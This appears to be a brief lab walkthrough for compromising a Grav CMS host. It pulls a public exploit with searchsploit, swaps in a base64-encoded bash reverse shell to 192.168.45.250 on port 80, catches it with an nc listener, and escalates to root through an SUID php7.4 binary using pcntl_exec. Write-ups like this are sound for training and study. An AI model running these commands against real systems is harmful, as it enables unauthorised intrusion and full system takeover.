80
We can search for exploits:
searchsploit grav
Using this exploit:
searchsploit -m php/webapps/49973.pysubl 49973.pyReplaced the following values: 
The base64 replaced with:
echo -ne "bash -i >& /dev/tcp/192.168.45.250/80 0>&1" | base64 -w0Then start a listener on port 80:
sudo rlwrap nc -nlvp 80We get a shell;
python3 49973.py
Running linpeas.sh: 
We found an SUID binary.
Running this to get root:
/usr/bin/php7.4 -r "pcntl_exec('/bin/sh', ['-p']);"
Last updated
Was this helpful?